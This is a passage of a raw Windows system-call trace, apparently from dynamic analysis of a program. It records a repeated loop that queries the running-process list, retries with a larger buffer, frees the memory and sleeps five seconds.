RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.110] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.110] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.123] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.126] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.138] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.139] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.140] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.143] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.154] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.159] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.160] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.170] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.171] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.173] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.173] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.186] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.191] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.203] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.207] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.208] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.218] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.219] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.222] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.233] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.233] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.235] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.236] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.250] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.251] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.251] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.252] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.255] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.267] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.268] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.282] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.283] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.284] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.287] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.288] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.298] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.309] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.310] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.311] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.313] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.314] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.331] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.331] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.341] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.342] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.342] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.346] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.346] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.366] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.367] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.375] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.376] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.376] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.376] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.378] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.379] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.387] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.388] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.391] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.391] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.404] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.404] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.407] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.407] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.419] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.420] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.423] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.434] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.438] 